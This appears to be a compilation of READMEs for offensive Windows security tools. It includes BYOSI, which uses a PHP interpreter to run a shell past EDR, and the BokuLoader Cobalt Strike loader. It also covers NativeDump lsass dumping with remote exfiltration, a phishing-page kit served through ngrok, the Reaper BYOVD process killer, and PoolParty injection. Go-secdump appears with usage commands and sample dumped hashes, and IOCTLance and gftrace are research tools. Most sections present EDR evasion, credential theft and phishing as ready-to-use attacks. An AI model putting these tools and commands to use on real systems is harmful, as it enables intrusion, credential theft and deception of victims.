Evade EDR's the simple way, by not touching any of the API's they hook.
I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit.
Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible.
Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering any EDR detections. EDRs typically overlook script files, focusing instead on binaries for implant delivery. They're configured to detect high entropy or suspicious sections in binaries, not simple scripts.
This attack method capitalizes on that oversight for significant profit. The PowerShell script's steps mirror what a developer might do when first entering an environment. Remarkably, just four lines of PowerShell code completely evade EDR detection, with Defender/AMSI also blind to it. Adding to the effectiveness, GitHub serves as a trusted deployer.
The PowerShell script achieves EDR/AV evasion through four simple steps (technically 3):
1.) It fetches the PHP archive for Windows and extracts it into a new directory named 'php' within 'C:\Temp'.
2.) The script then proceeds to acquire the implant PHP script or shell, saving it in the same 'C:\Temp\php' directory.
3.) Following this, it executes the implant or shell, utilizing the whitelisted PHP binary (which exempts the binary from most restrictions in place that would prevent the binary from running to begin with.)
With these actions completed, congratulations: you now have an active shell on a Crowdstrike-monitored system. What's particularly amusing is that, if my memory serves me correctly, Sentinel One is unable to scan PHP file types. So, feel free to let your imagination run wild.
I am in no way responsible for the misuse of this. This issue is a major blind spot in EDR protection, i am only bringing it to everyones attention.
A big thanks to @im4x5yn74x for affectionately giving it the name BYOSI, and helping with the env to test in bringing this attack method to life.
It appears as though MS Defender is now flagging the PHP script as malicious, but still fully allowing the Powershell script full execution. so, modify the PHP script.
hello sentinel one :) might want to make sure that you are making links not embed.
A proof-of-concept User-Defined Reflective Loader (UDRL) which aims to recreate, integrate, and enhance Cobalt Strike's evasion features!
Contributor | Notable Contributions | |
---|---|---|
Bobby Cooke | @0xBoku | Project original author and maintainer |
Santiago Pecin | @s4ntiago_p | Reflective Loader major enhancements |
Chris Spehn | @ConsciousHacker | Aggressor scripting |
Joshua Magri | @passthehashbrwn | IAT hooking |
Dylan Tran | @d_tranman | Reflective Call Stack Spoofing |
James Yeung | @5cript1diot | Indirect System Calls |
The built-in Cobalt Strike reflective loader is robust, handling all Malleable PE evasion features Cobalt Strike has to offer. The major disadvantage to using a custom UDRL is Malleable PE evasion features may or may not be supported out-of-the-box.
The objective of the public BokuLoader project is to assist red teams in creating their own in-house Cobalt Strike UDRL. The project aims to support all worthwhile CS Malleable PE evasion features. Some evasion features leverage CS integration, others have been recreated completely, and some are unsupported.
Before using this project, in any form, you should properly test the evasion features are working as intended. Between the C code and the Aggressor script, compilation with different versions of operating systems, compilers, and Java may return different results.
NtProtectVirtualMemory
obfuscate "true"
with custom UDRL Aggressor script implementation.0x1000
bytes will be nulls.XGetProcAddress
for resolving symbolsKernel32.GetProcAddress
xLoadLibrary
for resolving DLL's base address & DLL LoadingTEB->PEB->PEB_LDR_DATA->InMemoryOrderModuleList
Kernel32.LoadLibraryA
Command | Option(s) | Supported |
---|---|---|
allocator | HeapAlloc, MapViewOfFile, VirtualAlloc | All supported via BokuLoader implementation |
module_x64 | string (DLL Name) | Supported via BokuLoader implementation. Same DLL stomping requirements as CS implementation apply |
obfuscate | true/false | HTTP/S beacons supported via BokuLoader implementation. SMB/TCP is currently not supported for obfuscate true. Details in issue. Accepting help if you can fix :) |
entry_point | RVA as decimal number | Supported via BokuLoader implementation |
cleanup | true | Supported via CS integration |
userwx | true/false | Supported via BokuLoader implementation |
sleep_mask | (true/false) or (Sleepmask Kit+true) | Supported. When using default "sleepmask true" (without sleepmask kit) set "userwx true". When using sleepmask kit which supports RX beacon.text memory (src47/Ekko ) set "sleepmask true" && "userwx false". |
magic_mz_x64 | 4 char string | Supported via CS integration |
magic_pe | 2 char string | Supported via CS integration |
transform-x64 prepend | escaped hex string |
BokuLoader.cna Aggressor script modification |
transform-x64 strrep | string string |
BokuLoader.cna Aggressor script modification |
stomppe | true/false | Unsupported. BokuLoader does not copy beacon DLL headers over. First 0x1000 bytes of virtual beacon DLL are 0x00
|
checksum | number | Experimental. BokuLoader.cna Aggressor script modification |
compile_time | date-time string | Experimental. BokuLoader.cna Aggressor script modification |
image_size_x64 | decimal value | Unsupported |
name | string | Experimental. BokuLoader.cna Aggressor script modification |
rich_header | escaped hex string | Experimental. BokuLoader.cna Aggressor script modification |
stringw | string | Unsupported |
string | string | Unsupported |
make
BokuLoader.cna
Aggressor scriptUse the Script Console
to ensure BokuLoader was implemented in the beacon build
Does not support x86 option. The x86 bin is the original Reflective Loader object file.
RAW
beacons works out of the box. When using the Artifact Kit for the beacon loader, the stagesize
variable must be larger than the default.Original Cobalt Strike String | BokuLoader Cobalt Strike String |
---|---|
ReflectiveLoader | BokuLoader |
Microsoft Base Cryptographic Provider v1.0 | 12367321236742382543232341241261363163151d |
(admin) | (tomin) |
beacon | bacons |
Kernel32.LoadLibraryExA
is called to map the DLL from diskKernel32.LoadLibraryExA
is DONT_RESOLVE_DLL_REFERENCES (0x00000001)
RX
or RWX
memory will exist in the heap if sleepmask kit is not used.Kernel32.CreateFileMappingA
& Kernel32.MapViewOfFile
is called to allocate memory for the virtual beacon DLL.NtAllocateVirtualMemory
, NtProtectVirtualMemory
ntdll.dll
will not detect these systemcalls.mov eax, r11d; mov r11, r10; mov r10, rcx; jmp r11
assembly instructions within its executable memory.0x1000
bytes of the virtual beacon DLL are zeros.NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).
Usage:
NativeDump.exe [DUMP_FILE]
The default file name is "proc_
The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.
Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine
The project has three branches at the moment (apart from the main branch with the basic technique):
ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk
delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding
remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding
After reading Minidump undocumented structures, its structure can be summed up to:
I created a parsing tool which can be helpful: MinidumpParser.
We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.
The header is a 32-bytes structure which can be defined in C# as:
public struct MinidumpHeader
{
public uint Signature;
public ushort Version;
public ushort ImplementationVersion;
public ushort NumberOfStreams;
public uint StreamDirectoryRva;
public uint CheckSum;
public IntPtr TimeDateStamp;
}
The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header
Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:
public struct MinidumpStreamDirectoryEntry
{
public uint StreamType;
public uint Size;
public uint Location;
}
The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:
ID | Stream Type |
---|---|
0x00 | UnusedStream |
0x01 | ReservedStream0 |
0x02 | ReservedStream1 |
0x03 | ThreadListStream |
0x04 | ModuleListStream |
0x05 | MemoryListStream |
0x06 | ExceptionStream |
0x07 | SystemInfoStream |
0x08 | ThreadExListStream |
0x09 | Memory64ListStream |
0x0A | CommentStreamA |
0x0B | CommentStreamW |
0x0C | HandleDataStream |
0x0D | FunctionTableStream |
0x0E | UnloadedModuleListStream |
0x0F | MiscInfoStream |
0x10 | MemoryInfoListStream |
0x11 | ThreadInfoListStream |
0x12 | HandleOperationListStream |
0x13 | TokenStream |
0x16 | HandleOperationListStream |
First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:
public struct SystemInformationStream
{
public ushort ProcessorArchitecture;
public ushort ProcessorLevel;
public ushort ProcessorRevision;
public byte NumberOfProcessors;
public byte ProductType;
public uint MajorVersion;
public uint MinorVersion;
public uint BuildNumber;
public uint PlatformId;
public uint UnknownField1;
public uint UnknownField2;
public IntPtr ProcessorFeatures;
public IntPtr ProcessorFeatures2;
public uint UnknownField3;
public ushort UnknownField14;
public byte UnknownField15;
}
The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)
Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".
The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:
public struct ModuleListStream
{
public uint NumberOfModules;
public ModuleInfo[] Modules;
}
As there is only one, it gets simplified to:
public struct ModuleListStream
{
public uint NumberOfModules;
public IntPtr BaseAddress;
public uint Size;
public uint UnknownField1;
public uint Timestamp;
public uint PointerName;
public IntPtr UnknownField2;
public IntPtr UnknownField3;
public IntPtr UnknownField4;
public IntPtr UnknownField5;
public IntPtr UnknownField6;
public IntPtr UnknownField7;
public IntPtr UnknownField8;
public IntPtr UnknownField9;
public IntPtr UnknownField10;
public IntPtr UnknownField11;
}
The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)
Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.
public struct Memory64ListStream
{
public ulong NumberOfEntries;
public uint MemoryRegionsBaseAddress;
public Memory64Info[] MemoryInfoEntries;
}
Each module entry is a 16-bytes structure:
public struct Memory64Info
{
public IntPtr Address;
public IntPtr Size;
}
The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them
There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:
With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream
After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.
Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.
```bash git clone https://github.com/davenisc/thief_raccoon.git cd thief_raccoon
```bash apt install python3.11-venv
```bash python -m venv raccoon_venv source raccoon_venv/bin/activate
```bash pip install -r requirements.txt
Usage
```bash python app.py
After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.
If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.
If you want to make the phishing page accessible over the internet, use ngrok.
Using ngrok
Download ngrok from ngrok.com and follow the installation instructions for your operating system.
Expose your local server to the internet:
Get the public URL:
After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.
How to install Ngrok on Linux?
```bash curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok
```bash ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx
Deploy your app online
Put your app online at ephemeral domain Forwarding to your upstream service. For example, if it is listening on port http://localhost:8080, run:
```bash ngrok http http://localhost:5000
Example
```bash python app.py
```bash Select the operating system for phishing: 1. Windows 10 2. Windows 11 3. Windows XP 4. Windows Server 5. Ubuntu 6. Ubuntu Server 7. macOS Enter the number of your choice: 2
Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.
Disclaimer
This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.
License
This project is licensed under the MIT License. See the LICENSE file for details.
ScreenShots
Credits
Developer: @davenisc Web: https://davenisc.com
Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.
Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.
Note: Reaper does not kill the Windows Defender process, as it has a protection, Reaper is a simple proof of concept.
____
/ __ \___ ____ _____ ___ _____
/ /_/ / _ \/ __ `/ __ \/ _ \/ ___/
/ _, _/ __/ /_/ / /_/ / __/ /
/_/ |_|\___/\__,_/ .___/\___/_/
/_/
[Coded by MrEmpy]
[v1.0]
Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
Options:
sp, suspend process
kp, kill process
Values:
PROCESSID process id to suspend/kill
Examples:
Reaper.exe sp 1337
Reaper.exe kp 1337
You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.
Note: The executable and driver must be in the same directory.
A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title - injection-techniques-using-windows-thread-pools-35446">The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools
Variant ID | Varient Description |
---|---|
1 | Overwrite the start routine of the target worker factory |
2 | Insert TP_WORK work item to the target process's thread pool |
3 | Insert TP_WAIT work item to the target process's thread pool |
4 | Insert TP_IO work item to the target process's thread pool |
5 | Insert TP_ALPC work item to the target process's thread pool |
6 | Insert TP_JOB work item to the target process's thread pool |
7 | Insert TP_DIRECT work item to the target process's thread pool |
8 | Insert TP_TIMER work item to the target process's thread pool |
PoolParty.exe -V <VARIANT ID> -P <TARGET PID>
Insert TP_TIMER work item to process ID 1234
>> PoolParty.exe -V 8 -P 1234
[info] Starting PoolParty attack against process id: 1234
[info] Retrieved handle to the target process: 00000000000000B8
[info] Hijacked worker factory handle from the target process: 0000000000000058
[info] Hijacked timer queue handle from the target process: 0000000000000054
[info] Allocated shellcode memory in the target process: 00000281DBEF0000
[info] Written shellcode to the target process
[info] Retrieved target worker factory basic information
[info] Created TP_TIMER structure associated with the shellcode
[info] Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info] Written the specially crafted TP_TIMER structure to the target process
[info] Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExp iration
[info] PoolParty attack completed successfully
The default shellcode spawns a calculator via the WinExec API.
To customize the executable to execute, change the path in the end of the g_Shellcode
variable present in the main.cpp file.
Package go-secdump is a tool built to remotely extract hashes from the SAM registry hive as well as LSA secrets and cached hashes from the SECURITY hive without any remote agent and without touching disk.
The tool is built on top of the library go-smb and use it to communicate with the Windows Remote Registry to retrieve registry keys directly from memory.
It was built as a learning experience and as a proof of concept that it should be possible to remotely retrieve the NT Hashes from the SAM hive and the LSA secrets as well as domain cached credentials without having to first save the registry hives to disk and then parse them locally.
The main problem to overcome was that the SAM and SECURITY hives are only readable by NT AUTHORITY\SYSTEM. However, I noticed that the local group administrators had the WriteDACL permission on the registry hives and could thus be used to temporarily grant read access to itself to retrieve the secrets and then restore the original permissions.
Much of the code in this project is inspired/taken from Impacket's secdump but converted to access the Windows registry remotely and to only access the required registry keys.
Some of the other sources that have been useful to understanding the registry structure and encryption methods are listed below:
https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
http://www.beginningtoseethelight.org/ntsecurity/index.htm
https://social.technet.microsoft.com/Forums/en-US/6e3c4486-f3a1-4d4e-9f5c-bdacdb245cfd/how-are-ntlm-hashes-stored-under-the-v-key-in-the-sam?forum=win10itprogeneral
Usage: ./go-secdump [options]
options:
--host <target> Hostname or ip address of remote server
-P, --port <port> SMB Port (default 445)
-d, --domain <domain> Domain name to use for login
-u, --user <username> Username
-p, --pass <pass> Password
-n, --no-pass Disable password prompt and send no credentials
--hash <NT Hash> Hex encoded NT Hash for user password
--local Authenticate as a local user instead of domain user
--dump Saves the SAM and SECURITY hives to disk and
transfers them to the local machine.
--sam Extract secrets from the SAM hive explicitly. Only other explicit targets are included.
--lsa Extract LSA secrets explicitly. Only other explicit targets are included.
--dcc2 Extract DCC2 caches explicitly. Only ohter explicit targets are included.
--backup-dacl Save original DACLs to disk before modification
--restore-dacl Restore DACLs using disk backup. Could be useful if automated restore fails.
--backup-file Filename for DACL backup (default dacl.backup)
--relay Start an SMB listener that will relay incoming
NTLM authentications to the remote server and
use that connection. NOTE that this forces SMB 2.1
without encryption.
--relay-port <port> Listening port for relay (default 445)
--socks-host <target> Establish connection via a SOCKS5 proxy server
--socks-port <port> SOCKS5 proxy port (default 1080)
-t, --timeout Dial timeout in seconds (default 5)
--noenc Disable smb encryption
--smb2 Force smb 2.1
--debug Enable debug logging
--verbose Enable verbose logging
-o, --output Filename for writing results (default is stdout). Will append to file if it exists.
-v, --version Show version
go-secdump will automatically try to modify and then restore the DACLs of the required registry keys. However, if something goes wrong during the restoration part such as a network disconnect or other interrupt, the remote registry will be left with the modified DACLs.
Using the --backup-dacl
argument it is possible to store a serialized copy of the original DACLs before modification. If a connectivity problem occurs, the DACLs can later be restored from file using the --restore-dacl
argument.
Dump all registry secrets
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local
or
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2
Dump only SAM, LSA, or DCC2 cache secrets
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2
Dump registry secrets using NTLM relaying
Start listener
./go-secdump --host 192.168.0.100 -n --relay
Trigger an auth to your machine from a client with administrative access to 192.168.0.100 somehow and then wait for the dumped secrets.
YYYY/MM/DD HH:MM:SS smb [Notice] Client connected from 192.168.0.30:49805
YYYY/MM/DD HH:MM:SS smb [Notice] Client (192.168.0.30:49805) successfully authenticated as (domain.local\Administrator) against (192.168.0.100:445)!
Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0
2023/12/13 14:47:28 [Notice] [+] Signing is NOT required
2023/12/13 14:47:28 [Notice] [+] Login successful as domain.local\Administrator
[*] Dumping local SAM hashes
Name: Administrator
RID: 500
NT: 2727D7906A776A77B34D0430EAACD2C5
Name: Guest
RID: 501
NT: <empty>
Name: DefaultAccount
RID: 503
NT: <empty>
Name: WDAGUtilityAccount
RID: 504
NT: <empty>
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: 0x15deadbeef645e75b38a50a52bdb67b4
$MACHINE.ACC:plain_password_hex:47331e26f48208a7807cafeababe267261f79fdc 38c740b3bdeadbeef7277d696bcafebabea62bb5247ac63be764401adeadbeef4563cafebabe43692deadbeef03f...
[*] DPAPI_SYSTEM
dpapi_machinekey: 0x8afa12897d53deadbeefbd82593f6df04de9c100
dpapi_userkey: 0x706e1cdea9a8a58cafebabe4a34e23bc5efa8939
[*] NL$KM
NL$KM: 0x53aa4b3d0deadbeef42f01ef138c6a74
[*] Dumping cached domain credentials (domain/username:hash)
DOMAIN.LOCAL/Administrator:$DCC2$10240#Administrator#97070d085deadbeef22cafebabedd1ab
...
Dump secrets using an upstream SOCKS5 proxy either for pivoting or to take advantage of Impacket's ntlmrelayx.py SOCKS server functionality.
When using ntlmrelayx.py as the upstream proxy, the provided username must match that of the authenticated client, but the password can be empty.
./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server
...
./go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080
Presented at CODE BLUE 2023, this project titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis introduces IOCTLance, a tool that enhances its capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknow n ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.
docker build .
dpkg --add-architecture i386
apt-get update
apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
libffi-dev libxslt1-dev libxml2-dev
pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9
# python3 analysis/ioctlance.py -h
usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
[-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
path
positional arguments:
path dir (including subdirectory) or file path to the driver(s) to analyze
optional arguments:
-h, --help show this help message and exit
-i IOCTLCODE, --ioctlcode IOCTLCODE
analyze specified IoControlCode (e.g. 22201c)
-T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
-t TIMEOUT, --timeout TIMEOUT
timeout for analyze each IoControlCode (default 40, 0 to unlimited)
-l LENGTH, --length LENGTH
the limit of number of instructions for technique L engthLimiter (default 0, 0
to unlimited)
-b BOUND, --bound BOUND
the bound for technique LoopSeer (default 0, 0 to unlimited)
-g GLOBAL_VAR, --global_var GLOBAL_VAR
symbolize how many bytes in .data section (default 0 hex)
-a ADDRESS, --address ADDRESS
address of ioctl handler to directly start hunting with blank state (e.g.
140005c20)
-e EXCLUDE, --exclude EXCLUDE
exclude function address split with , (e.g. 140005c20,140006c20)
-o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
-r, --recursion do not kill state if detecting recursion (default False)
-c, --complete get complete base state (default False)
-d, --debug print debug info while analyzing (default False)
# python3 evaluation/statistics.py -h
usage: statistics.py [-h] [-w] path
positional arguments:
path target dir or file path
optional arguments:
-h, --help show this help message and exit
-w, --wdm copy the wdm drivers into <path>/wdm
A command line Windows API tracing tool for Golang binaries.
Note: This tool is a PoC and a work-in-progress prototype so please treat it as such. Feedbacks are always welcome!
Although Golang programs contains a lot of nuances regarding the way they are built and their behavior in runtime they still need to interact with the OS layer and that means at some point they do need to call functions from the Windows API.
The Go runtime package contains a function called asmstdcall and this function is a kind of "gateway" used to interact with the Windows API. Since it's expected this function to call the Windows API functions we can assume it needs to have access to information such as the address of the function and it's parameters, and this is where things start to get more interesting.
Asmstdcall receives a single parameter which is pointer to something similar to the following structure:
struct LIBCALL {
DWORD_PTR Addr;
DWORD Argc;
DWORD_PTR Argv;
DWORD_PTR ReturnValue;
[...]
}
Some of these fields are filled after the API function is called, like the return value, others are received by asmstdcall, like the function address, the number of arguments and the list of arguments. Regardless when those are set it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.
The gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log it to the user. The tool is capable of log the function name, it's parameters and also the return value of each Windows function called by a Golang application. All of it with no need to hook a single API function or have a signature for it.
The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).
If you want to know more about this project and research check the blogpost.
Download the latest release.
gftrace.exe <filepath> <params>
All you need to do is specify which functions you want to trace in the gftrace.cfg file, separating it by comma with no spaces:
CreateFileW,ReadFile,CreateProcessW
The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined either by analysis of the method itself or trying to guess it. There's some interesting characteristics that can be used to determine it, for example, Golang applications seems to always prefer to call functions from the "Wide" and "Ex" set (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc) so you can consider it during your analysis.
The default config file contains multiple functions in which I tested already (at least most part of them) and can say for sure they can be called by a Golang application at some point. I'll try to update it eventually.
Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:
- CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
- CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
Tracing CreateProcessW() in the TunnelFish malware:
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)
[...]
Tracing multiple functions in the Sunshuttle malware:
- CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
- WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
- WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
- WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
